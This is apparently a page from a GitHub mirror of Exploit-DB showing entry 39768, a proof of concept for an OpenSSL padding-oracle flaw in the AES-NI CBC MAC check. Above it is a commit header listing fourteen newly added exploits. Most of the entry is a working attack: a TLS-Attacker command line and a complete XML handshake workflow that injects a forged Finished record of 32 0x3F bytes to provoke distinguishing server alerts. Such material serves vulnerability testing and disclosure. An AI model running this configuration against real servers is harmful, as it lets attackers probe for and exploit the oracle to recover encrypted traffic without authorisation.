bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/multiple/dos/39768.txt
Offensive Security 5a82bad23d DB: 2016-05-05 
14 new exploits

Alibaba Clone B2B Script - Admin Authentication Bypass
CMS Made Simple < 2.1.3 & < 1.12.1 - Web Server Cache Poisoning
Acunetix WP Security Plugin 3.0.3 - XSS
NetCommWireless HSPA 3G10WVE Wireless Router – Multiple Vulnerabilities
TRN Threaded USENET News Reader 3.6-23 - Local Stack-Based Overflow
IPFire < 2.19 Core Update 101 - Remote Command Execution
PHP Imagick 3.3.0 - disable_functions Bypass
ImageMagick < 6.9.3-9 - Multiple Vulnerabilities
OpenSSL Padding Oracle in AES-NI CBC MAC Check
Zabbix Agent 3.0.1 - mysql.size Shell Command Injection
McAfee LiveSafe 14.0 - Relocations Processing Memory Corruption
Linux (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (/etc/shadow)
Linux Kernel 4.4.x (Ubuntu 16.04) - Use-After-Free via double-fdput() in bpf(BPF_PROG_LOAD) Error Path Local Root Exploit
Linux (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps
2016-05-05 05:04:38 +00:00

76 lines
3.3 KiB
Text
Executable file
Raw Blame History

Source: http://web-in-security.blogspot.ca/2016/05/curious-padding-oracle-in-openssl-cve.html
TLS-Attacker:
https://github.com/RUB-NDS/TLS-Attacker
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39768.zip
You can use TLS-Attacker to build a proof of concept and test your implementation. You just start TLS-Attacker as follows:
java -jar TLS-Attacker-1.0.jar client -workflow_input rsa-overflow.xml -connect $host:$port
The xml configuration file (rsa-overflow.xml) looks then as follows:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workflowTrace>
<protocolMessages>
<ClientHello>
<messageIssuer>CLIENT</messageIssuer>
<includeInDigest>true</includeInDigest>
<extensions>
<EllipticCurves>
<supportedCurvesConfig>SECP192R1</supportedCurvesConfig>
<supportedCurvesConfig>SECP256R1</supportedCurvesConfig>
<supportedCurvesConfig>SECP384R1</supportedCurvesConfig>
<supportedCurvesConfig>SECP521R1</supportedCurvesConfig>
</EllipticCurves>
</extensions>
<supportedCompressionMethods>
<CompressionMethod>NULL</CompressionMethod>
</supportedCompressionMethods>
<supportedCipherSuites>
<CipherSuite>TLS_RSA_WITH_AES_128_CBC_SHA</CipherSuite>
<CipherSuite>TLS_RSA_WITH_AES_256_CBC_SHA</CipherSuite>
<CipherSuite>TLS_RSA_WITH_AES_128_CBC_SHA256</CipherSuite>
<CipherSuite>TLS_RSA_WITH_AES_256_CBC_SHA256</CipherSuite>
</supportedCipherSuites>
</ClientHello>
<ServerHello>
<messageIssuer>SERVER</messageIssuer>
</ServerHello>
<Certificate>
<messageIssuer>SERVER</messageIssuer>
</Certificate>
<ServerHelloDone>
<messageIssuer>SERVER</messageIssuer>
</ServerHelloDone>
<RSAClientKeyExchange>
<messageIssuer>CLIENT</messageIssuer>
</RSAClientKeyExchange>
<ChangeCipherSpec>
<messageIssuer>CLIENT</messageIssuer>
</ChangeCipherSpec>
<Finished>
<messageIssuer>CLIENT</messageIssuer>
<records>
<Record>
<plainRecordBytes>
<byteArrayExplicitValueModification>
<explicitValue>
3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F
3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F
</explicitValue>
</byteArrayExplicitValueModification>
</plainRecordBytes>
</Record>
</records>
</Finished>
<ChangeCipherSpec>
<messageIssuer>SERVER</messageIssuer>
</ChangeCipherSpec>
<Finished>
<messageIssuer>SERVER</messageIssuer>
</Finished>
</protocolMessages>
</workflowTrace>
It looks to be complicated, but it is just a configuration for a TLS handshake used in TLS-Attacker, with an explicit value for a plain Finished message (32 0x3F bytes). If you change the value in the Finished message, you will see a different alert message returned by the server.
Reference in a new issue View git blame Copy permalink